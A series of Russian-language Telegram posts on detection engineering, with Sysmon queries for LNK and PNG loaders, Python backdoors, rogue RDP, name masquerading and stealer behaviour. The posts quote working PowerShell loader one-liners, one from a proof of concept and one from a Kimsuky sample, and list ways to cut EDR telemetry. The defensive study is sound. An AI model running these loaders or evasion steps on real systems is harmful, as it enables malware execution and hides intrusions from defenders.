MalDev Academy представили POC для скрытия и извлечения исполняемого файла из PNG-картинки. Для запуска используется LNK-файл, который запускает
🔤 для запукска dll
🔤 для запукска exe
Для скрытия обнаружения при анализе файла, перед аргументами вставляется 512 символов
Можем ли мы обнаружить такое поведение?))🔭
#ttp@detectioneasy
#detection@detectioneasy
powershell.exe с аргументами:
$data=[IO.File]::ReadAllBytes('{opng_fname}');$key=$data[{xor_key_offset}];$file=$env:TEMP+'\\{otpt_pe_file_name}';$i=[Text.Encoding]::ASCII.GetString($data).LastIndexOf('IDAT')+4;$xdata = ($data[$i..$data.Length] | ForEach-Object {{ $_ -bxor $key }}); [IO.File]::WriteAllBytes($file, $xdata); rundll32.exe $file {runtime_exprtdfnc_args}
$data=[IO.File]::ReadAllBytes('{opng_fname}');$key=$data[{xor_key_offset}];$file=$env:TEMP+'\\{otpt_pe_file_name}';$i=[Text.Encoding]::ASCII.GetString($data).LastIndexOf('IDAT')+4;$xdata = ($data[$i..$data.Length] | ForEach-Object {{ $_ -bxor $key }}); [IO.File]::WriteAllBytes($file, $xdata); cmd /c $file
Для скрытия обнаружения при анализе файла, перед аргументами вставляется 512 символов
пробела.Можем ли мы обнаружить такое поведение?))
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Maldev-Academy/ExecutePeFromPngViaLNK: Extract and execute a PE embedded within a PNG file using an LNK file.
Extract and execute a PE embedded within a PNG file using an LNK file. - Maldev-Academy/ExecutePeFromPngViaLNK
🔥4👍2🍌2
Построить обнаружение мы можем, опираясь на события журналов
Подозрительная активность может начинаться с дропа LNK-файла в дирректорию пользователя или в
Если мы рассматриваем такую сборку как первый стейдж, скорее всего доставка будет в архиве, т.к. вряд ли у кого-то на почтовом шлюзе еще не заблокирована доставка LNK🙃 . Аналогичная ситуация при загрузке с линка, пользователю необходимо загружать два файла (+ браузер может заблокировать загрузку), что неудобно, поэтому атакующим нужно выдавать нагрузку в архиве.
При запуске LNK из архива реализация команды в POC работать не будет😉 . Атакующим нужно убедить жертву распаковать архив.
Порассуждали, можем обнаружить🔭
🔤 Обнаружим создание LNK в дирректории пользователя
🔤 Проверим аргументы с которыми запускается powershell
🔤 Не забудем проверить
🔤 И добавим детект на основе ADS NTFS
#ttp@detectioneasy
#detection@detectioneasy
Sysmon. События журнала Windows Powershell рассматривать не будем - логика схожа с событиями создания процесса.Подозрительная активность может начинаться с дропа LNK-файла в дирректорию пользователя или в
%TEMP%. Если мы рассматриваем такую сборку как первый стейдж, скорее всего доставка будет в архиве, т.к. вряд ли у кого-то на почтовом шлюзе еще не заблокирована доставка LNK
При запуске LNK из архива реализация команды в POC работать не будет
Порассуждали, можем обнаружить
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.lnk"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = ".*-bxor.*" and CommandLine = "0x.*" and CommandLine = ".*WriteAllBytes" and Image=".*powershell.exe"
-bxor 0x в base64
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = ".*IAAtAGIAeABvAHIAIAAwAHgA.*" and Image=".*powershell.exe"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename = "?:\Users\.*\.lnk:Zone.Identifier" and Contents=".*ZoneId=3.*"
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥2🍌2
Привет всем
Для формирования требований на разработку правил обнаружения можно использовать платформы для управления проектами или Help Desk. Важно
Это особенно критично
актуальных для вас уязвимостей и TTP, они обеспечивают. Это поможет избежать пробелов в обнаружении угроз.Формирование требований и создание задач на разработку правил может быть организовано в разных системах или проектах. Такое разделение можно обосновать необходимостью ограничения доступа к контенту, который используется для обнаружения.
Отдельная проблема — поддержка контроля версий контента. Не все SIEM позволяют писать контент в виде кода
Итак, у организации World of Detection должна быть возможность:
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет! 👋
Мы описали пример, как определить источники требований к мониторингу. Давайте попробуем кратко описать этот процесс для выдуманной компании World of detection.
1. Описание источника требования:
🔤 Департамент информационной безопасности (ИБ)…
Мы описали пример, как определить источники требований к мониторингу. Давайте попробуем кратко описать этот процесс для выдуманной компании World of detection.
1. Описание источника требования:
🔤 Департамент информационной безопасности (ИБ)…
👍4🔥2🍌2
Использование Python 🐍 для компрометации систем всем известная техника. Для ее реализации необходимо приносить интерпретатор (если его еще нет😁 ) или компилировать скрипт в исполняемый на целевой машине формат.
Небольшой обзор применения Python-скриптов
Сможем обнаружить вовремя?)🔭
#ttp@detectioneasy
Небольшой обзор применения Python-скриптов
Сможем обнаружить вовремя?)
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GuidePoint Security
RansomHub Affiliate leverages Python-based backdoor
GuidePoint Security RansomHub Affiliate leverages Python-based backdoor. Breaking news from GRIT, get the details here.
👍5🔥2🍌2
А вы знаете в чем отличие между python.exe и pythonw.exe ⁉️
Что с обнаружением?) Ничего сверхъестественного🪄 мы не увидим, но нужно профилировать, особенно, если у вас ведется разработка ПО на python.
🔤 обнаруживаем создание файлов
🔤 обнаруживаем в аргументах командой строки
🔤 обнаруживаем запуск переименованного интерпретатора python
🔤 обнаруживаем запуск интерпретатора python
Правила общие, при использовании скриптов для автоматизации можно похантить отличия запускаемых файлов, и проверять хеши скриптов, чтобы предотвратить внедрение в них вредоносного кода
#detection@detectioneasy
pythonw.exe - позволяет запускать скрипты без открытия окна консоли, что не привлечет внимания пользователя.Что с обнаружением?) Ничего сверхъестественного
py? или python
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and (TargetFilename = "?:\Users\.*\.py.?" or TargetFilename = "?:\Users\.*\\python.?\.exe")
python
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = «.*\\python.?\.exe"
ProviderName="Microsoft-Windows-Sysmon" and OriginalFileName = "python.?" and Image != ".*\\python.?\.exe"
ProviderName="Microsoft-Windows-Sysmon" and Image = ".*\python.?\.exe" and OriginalFileName = "python.?"
Правила общие, при использовании скриптов для автоматизации можно похантить отличия запускаемых файлов, и проверять хеши скриптов, чтобы предотвратить внедрение в них вредоносного кода
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3🍌3
Как называется метод, когда хакеры приносят свой интерпретатор на хост?🗑
Anonymous Quiz
20%
BYOS
20%
BYOD
8%
BYOE
52%
BYOI
😁5❤1👍1
Всем привет
Продолжаем формировать процесс Detection Engineering в компании
World of Detection. К этому моменту у нас уже внедрен трекер задач для учета и ведется активная разработка и доработка правил обнаружения. Однако аналитики не успевают справляться с поступающими задачами.Рассмотрим ситуацию)
У компании
World of Detection используется Exchange, а OWA (Outlook Web Access) доступна из интернета. В трекер задач поступил запрос на разработку правила для обнаружения эксплуатации уязвимости Хакеры
Когда начали разбираться, почему уязвимость не была обнаружена своевременно, выяснилось, что запрос на разработку правила уже был в трекере. Аналитики еще раз пояснили, что обрабатывают задачи по мере их поступления, без какой-либо фильтрации или приоритизации.
Что мы упустили?
Один из ключевых этапов — triage (сортировка и приоритизация задач). В созданной нами ранее карточки не предусмотрено поле для критичности (срочности).
Далее я рассмотрю один из способов расчета критичности для задачи на разработку правил обнаружения. Этот способ не является панацеей, и у каждой компании может быть свой подход к определению критичности и срочности разработки правил.
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4⚡3🔥3
Неплохой вариант для фишинга 🧐 ?)
Что же нам делать?)
🔤 По старинке, смотрим создавались ли у нас файлы с расширением theme
🔤 Обращение explorer.exe и rundll32.exe на 445 порт за пределы сети
🔤 Загрузка DLL с удаленного ресурса
Хочется верить, что уже у всех закрыт доступ по WebDAV и SMB за пределы корпоративной сети)
#ttp@detectioneasy
#detection@detectioneasy
Что же нам делать?)
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.theme"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort = 445 and (Image endswith "explorer.exe" or Image endswith "rundll32.exe")
ProviderName="Microsoft-Windows-Sysmon" and EventId = 10 and Image endswith "rundll32.exe" and ImageLoaded startswith = '\\\\'
Хочется верить, что уже у всех закрыт доступ по WebDAV и SMB за пределы корпоративной сети)
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3👏2🍌1
Наткнулся на удобную утилиту для извлечения и расшифровки 😎 😈 данных браузера (macOS, Windows, Linux).
#ttp@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
😱5👍1😁1
Всем привет 👋 )
Популярна тема скрытия от обнаружения, для этого нам нужно, чтобы телеметрия от хоста не дошла до сервера управления✋
И мне кажется топ самых простых способов:
🔤 😱
🔤 🔥
🔤 Таблица маршрутизации) мы можем сделать
#ttp@detectioneasy
Популярна тема скрытия от обнаружения, для этого нам нужно, чтобы телеметрия от хоста не дошла до сервера управления
И мне кажется топ самых простых способов:
DNS-Sinkhole, добавляем имя сервера управления в hosts и указываем ему адрес 127.0.0.1 Хостовой МСЭ, добавим правило, блокирующее доступ до адреса сервера управления blackhole route 🛣#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3👏2⚡1
Всем привет 🙂
Еще один пример использования *.lnk для доставки💼 малвари и скрытия своих действий)
😁
Примеры обнаружения были ранее🔭 но хакеры использовали ещё одну технику 😎
Еще один пример использования *.lnk для доставки
powershell -windowstyle hidden ($o)bf_lnkpath = Get-Child(It)em *.lnk ^| where(-)object {$_.length -eq 0(0)395530} ^| Select-Object -Exp(a)ndProperty FullName;$o(b)f_file = [system.io(.)file]::ReadAll(B)ytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'(+)(Get-Random)+'(.)zip';$obf_path = [Envir(o)nment]::Expa(n)dEnvironmentVa(r)iables($obf_path);$obf_dir = [System.IO(.)Path]::GetDire(c)toryName($obf_path);[Syste(m).IO.File]::WriteA(l)lBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA Sile(n)tlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyCo(n)tinue -Force ^| Out-Null;^& .\svchost(.)exe
Компания World of detection, больше не боится такого поведения Примеры обнаружения были ранее
#ttp@detectioneasyPlease open Telegram to view this post
VIEW IN TELEGRAM
꿈을꾸는 파랑새
김수키(Kimsuky)에서 만든 코발트 스트라이크(Cobalt Strike) 악성코드-test.zip(2025.1.11)
오늘은 우리가 정말로 존경하지 않는 북한 김수키(Kimsuky)에서 만든 코발트 스트라이크(Cobalt Strike) 악성코드-test.zip(2025.1.11)에 대해 글을 적어보겠습니다.해당 악성코드는 다음과 같습니다.파일명:test.zip사이즈:15,282 BytesMD5:8d3dd8b5a883a2080525a11807b2a6e1SHA-1:da3cbfad064e12c4334161a00335c0176011d0c2SHA-256:c2faf67cab95…
👍4⚡3🔥3
Я часто упоминаю события Sysmon, думаю многие с ними знакомы 🙃
Для начинающих специалистов будет полезна статья с разбором каждого события😎
#detection@detectioneasy
Для начинающих специалистов будет полезна статья с разбором каждого события
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
RootDSE
Understanding Sysmon Events using SysmonSimulator
Introduction
👍3❤1🔥1
Израильский CERT выпустил отчет о работе стиллеров с советами по обнаружению 🔭 )
🔤 Топ событий Sysmon, которых достаточно для обнаружения, по их мнению:
🔤 EventID 1 - создание процессов
🔤 EventID 3 - создание сетевого соединения
🔤 EventID 11 - создание файла
🔤 EventID 12 - создание или удаление ключа реестра
🔤 EventID 13 - установка значения для реестра
🔤 EventID 15 - создание ADS NTFS
🔤 EventID 22 - DNS-запрос
🔤 Еще они поделились несколькими правилами для обнаружения, давайте рассмотрим их
🔤 - загрузка легитимных библиотек, детект строят на логах прокси или nta, и обнаруживают совпадение по названиям системных dll
⚠️ мы можем добавить другой детект, на основе события Sysmon EventID=15
🔤 - использование сервисов для проверки своего IP, мы будем использовать Sysmon EventID 22, также можем искать в логах NTA или IDS
🔤 Эксфильтрация данных, тут уже придумали 1001 и способ как вынести нужную информацию из корпоративной сети. Есть фреймворк Living Off Trusted Sites в нем собирают ресурсы, которые можно использовать для эксфильтрации. Способ обнаружения, как выше, но с другими ресурсами.
🔤 Обнаружение подозрительных user-agents, они обнаруживают только
🔤 Создание архивов, через консольные утилиты, рассмотрены не все способы, они делают упор на 7z:
#ttp@detectioneasy
#detection@detectioneasy
uri="*msvcp140.dll"
OR uri="*vcruntime140.dll"
OR uri="*mozglue.dll"
OR uri="*freebl3.dll"
OR uri="*softokn3.dll"
OR uri="*nss3.dll"
OR uri="*sqlite3.dll"
⚠️ мы можем добавить другой детект, на основе события Sysmon EventID=15
TargetFileName="*msvcp140.dll:Zone.Identifier"
OR TargetFileName="*vcruntime140.dll:Zone.Identifier"
OR TargetFileName="*mozglue.dll:Zone.Identifier"
OR TargetFileName="*freebl3.dll:Zone.Identifier"
OR TargetFileName="*softokn3.dll:Zone.Identifier"
OR TargetFileName="*nss3.dll:Zone.Identifier"
OR TargetFileName="*sqlite3.dll:Zone.Identifier"
EventID=22 AND QueryName IN ["*wtfismyip.com", "*checkip.*",
"*ipecho.net",
"*ipinfo.io",
"*api.ipify.org",
"*icanhazip.com",
"*ip.anysrc.com",
"*api.ip.sb",
"ident.me",
"www.myexternalip.com",
"*zen.spamhaus.org",
"*cbl.abuseat.org",
"*b.barracudacentral.org",
"*dnsbl-1.uceprotect.net",
"*spam.dnsbl.sorbs.net",
"*iplogger.org*",
"*ip-api.com*",
"*geoip.*"]
user_agent="*powershell*" OR
user_agent="*curl*", мы можем добавить сюда еще user_agent="*bits*" , user_agent="*wget*"
CommandLine = "'7z.exe a .*
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍2👏2🤨1
У 7z обнаружена новая уязвимость - ⚠️ , которая не распространяет метку MotW, на разархивированные файлы. Разработчики исправили уязвимость в новой версии приложения
Уязвимость может использоваться в фишинговых кампаниях📩 , при открытии файла у пользователя не будет предупреждения от SmartScreen 😈
#ttp@detectioneasy
CVE-2025-0411 Уязвимость может использоваться в фишинговых кампаниях
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Zerodayinitiative
ZDI-25-045
7-Zip Mark-of-the-Web Bypass Vulnerability
⚡3😁2👍1
В посте раннее, я упомянул про использование еще одной техники -
⚠️
В том примере создается файл с именем
🔤 Как это работает
Злоумышленники создают файлы или процессы с именами, которые совпадают с именами системных файлов (например, svchost.exe, explorer.exe, lsass.exe)
🔭 Обнаружение
🔤 Для обнаружения такого поведения, мы можем отслеживать запуск процессов (нужно иметь список системных файлов) не из системных дирректорий
Еще хакеры любят называть процессы под имена средств защиты, особенно под Windows Defender😄
🔤 Другой вариант, записать хеши системных файлов в таблицу (их мы можем взять, например из события
🔤 Можем проверять наличие цифровой подписи у файла, с именем из списка системных файлов
🔤 Создание нового файла с системным именем
🔤 Создание ADS NTFS
#ttp@detectioneasy
#detection@detectioneasy
Masquerading: Match Legitimate Name or Location. Masquerading: Match Legitimate Name or Location — это техника, которая используется злоумышленниками для маскировки вредоносных файлов или процессов под легитимные. В том примере создается файл с именем
svchost.exe , которое совпадает с именем системного файла Windows.Злоумышленники создают файлы или процессы с именами, которые совпадают с именами системных файлов (например, svchost.exe, explorer.exe, lsass.exe)
EventId=1 and Image != ".?:\\Windows\\" and (Image endswith "smss.exe" OR
Image endswith "ntoskrnl.exe" OR
Image endswith "crmss.exe" OR
Image endswith "wininit.exe" OR
Image endswith "winlogon.exe" OR
Image endswith "services.exe" OR
Image endswith "lsaiso.exe" OR
Image endswith "lsass.exe" OR
Image endswith "spoolsv.exe" OR
Image endswith "dllhost.exe" OR
Image endswith "lsm.exe" OR
Image endswith "svchost.exe" OR
Image endswith "runtimebroker.exe" OR
Image endswith "taskhostw.exe" OR
Image endswith "userinit.exe")
Еще хакеры любят называть процессы под имена средств защиты, особенно под Windows Defender
Sysmon EventID=1). Если имя запускаемого процесса совпадает, с именем из таблицы - сравнивать хеш. Стоит учесть, что при обновлении ПО - хеши системных файлов будут меняться
EventId=11 and
(TargetFilename endswith "smss.exe" OR
TargetFilename endswith "ntoskrnl.exe" OR
TargetFilename endswith "crmss.exe" OR
TargetFilename endswith "wininit.exe" OR
TargetFilename endswith "winlogon.exe" OR
TargetFilename endswith "services.exe" OR
TargetFilename endswith "lsaiso.exe" OR
TargetFilename endswith "lsass.exe" OR
TargetFilename endswith "spoolsv.exe" OR
TargetFilename endswith "dllhost.exe" OR
TargetFilename endswith "lsm.exe" OR
TargetFilename endswith "svchost.exe" OR
TargetFilename endswith "runtimebroker.exe" OR
TargetFilename endswith "taskhostw.exe" OR
TargetFilename endswith "userinit.exe")
EventId=15 and (
TargetFilename endswith "smss.exe:Zone.Identifier" OR
TargetFilename endswith "ntoskrnl.exe:Zone.Identifier" OR
TargetFilename endswith "crmss.exe:Zone.Identifier" OR
TargetFilename endswith "wininit.exe:Zone.Identifier" OR
TargetFilename endswith "winlogon.exe:Zone.Identifier" OR
TargetFilename endswith "services.exe:Zone.Identifier" OR
TargetFilename endswith "lsaiso.exe:Zone.Identifier" OR
TargetFilename endswith "lsass.exe:Zone.Identifier" OR
TargetFilename endswith "spoolsv.exe:Zone.Identifier" OR
TargetFilename endswith "dllhost.exe:Zone.Identifier" OR
TargetFilename endswith "lsm.exe:Zone.Identifier" OR
TargetFilename endswith "svchost.exe:Zone.Identifier" OR
TargetFilename endswith "runtimebroker.exe:Zone.Identifier" OR
TargetFilename endswith "taskhostw.exe:Zone.Identifier" OR
TargetFilename endswith "userinit.exe:Zone.Identifier")
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет 🙂
Еще один пример использования *.lnk для доставки 💼 малвари и скрытия своих действий)
powershell -windowstyle hidden ($o)bf_lnkpath = Get-Child(It)em *.lnk ^| where(-)object {$_.length -eq 0(0)395530} ^| Select-Object -Exp(a)ndProperty Full…
Еще один пример использования *.lnk для доставки 💼 малвари и скрытия своих действий)
powershell -windowstyle hidden ($o)bf_lnkpath = Get-Child(It)em *.lnk ^| where(-)object {$_.length -eq 0(0)395530} ^| Select-Object -Exp(a)ndProperty Full…
👍4🔥4🍌3🎄1
Detection is easy
У 7z обнаружена новая уязвимость - CVE-2025-0411 ⚠️ , которая не распространяет метку MotW, на разархивированные файлы. Разработчики исправили уязвимость в новой версии приложения Уязвимость может использоваться в фишинговых кампаниях 📩 , при открытии файла…
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - dhmosfunk/7-Zip-CVE-2025-0411-POC: This repository contains POC scenarios as part of CVE-2025-0411 MotW bypass.
This repository contains POC scenarios as part of CVE-2025-0411 MotW bypass. - dhmosfunk/7-Zip-CVE-2025-0411-POC
👍4🍌4🔥3
Всем привет!) 👋
Продолжим тему с фишингом💌 , компания Innostage поделилась техникой с помощью которой их хотели взломать - 🔤 Пользователю на почту приходит письмо с файлом 🔤 Пользователь открывает файл и подключается к удаленному серверу
Казалось бы ничего страшного произойти не может💀
При подключении к серверу, локальные диски пользователя монтируются на удаленную машину, которая под контролем плохих парней😠 дальше они могут взаимодействовать с файловой системой, например как в статье Innostage, создать закреп в директории автозагрузки
#ttp@detectioneasy
Продолжим тему с фишингом
rogue rdp
*.rdp
Казалось бы ничего страшного произойти не может
*.rdp - это текстовый конфигурационный файл для клиента rdp, злоумышленники формируют его с введеной учетной записью, и включенными настройками для перенаправления локальных устройств. При подключении к серверу, локальные диски пользователя монтируются на удаленную машину, которая под контролем плохих парней
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Вложение с сюрпризом: очередная атака с помощью Rogue RDP
Innostage продолжают атаковать — и исследователи в рамках открытых кибериспытаний , и злоумышленники. На этот раз новый фишинг, но непростой, а с подвохом. Рассказываем, как обнаружили новую атаку и...
🔥5👍3🍌3
Detection is easy
Всем привет!) 👋 Продолжим тему с фишингом 💌 , компания Innostage поделилась техникой с помощью которой их хотели взломать - rogue rdp 🔤 Пользователю на почту приходит письмо с файлом *.rdp 🔤 Пользователь открывает файл и подключается к удаленному серверу…
Как мы можем защититься от рассылок ✉️ ?)
🔤 блокировать на почтовом шлюзе вложения - ✋
🔤 ограничить сетевой доступ по rdp вне корпоративной сети (можно межстевым экраном винды 💻 )
🔤 ограничить групповой политикой возможности rdp (монтирование дисков, буфер обмена и т.п.)
Как будем обнаруживать🔭
🔤 соединение процесса
🔤 создание файла
🔤 создание файлов процессом
#detection@detectioneasy
*.rdp файлов *.rdp
Computer Configuration\
Administrative Templates\
Windows Components\
Remote Desktop Services\
Remote Desktop Session Host
Как будем обнаруживать
mstsc.exe на удаленный сервер
ProviderName="Microsoft-Windows-Sysmon" and EventId = 3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and Image endswith "mstsc.exe"
*.rdp
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename endswith ".rdp"
mstsc.exe
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and Image endswith "mstsc.exe"
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3🍌3
Всем привет 🙃 Добьем тему с
Несколько материалов для изучения:
🔤 утилита для реализации MiTM RDP, позволяет проксировать соединение на rdp-сервера злоумышленников
🔤 пример использования со стороны RedTeam
🔤 обзор атаки от blackhillsinfosec
#ttp@detectioneasy
rogue rdp)Несколько материалов для изучения:
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - GoSecure/pyrdp: RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or…
RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact - GoSecure/pyrdp
🔥4👍3❤2🍌1
Эксфильтровать данные на свои сервера слишком шумно?) 🎼
Ресурс lolc2 предлагает выбрать соцсеть через которую управлять маяком👨💻 , после выбора будут предложены C2 для работы
Контролируете доступ к ним?)⛔️
#ttp@detectioneasy
Ресурс lolc2 предлагает выбрать соцсеть через которую управлять маяком
Контролируете доступ к ним?)
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🍌3👍2😁1
Продолжим тему с Python 🐍
При использовании🧐 можно поменять в исходниках))
🔤 обнаруживаем создание файлов в директории 🔭
Я намеренно не стал хардкодить
#detection@detectioneasy
При использовании
pyinstaller в режиме onefile , загрузчик создает директорию со следующем именем temppath/_MEIxxxxxx swprintf(prefix, 16, L"_MEI%d", _getpid());
_MEIxxxxxx ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "^[a-zA-Z]:\\.*_MEI\d+\\.*\.py.?$"
Я намеренно не стал хардкодить
Temp, т.к. при сборке файла можно указать директорию для Runtime аргументом - runtime-tmpdir (на скрине пример)#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3🍌3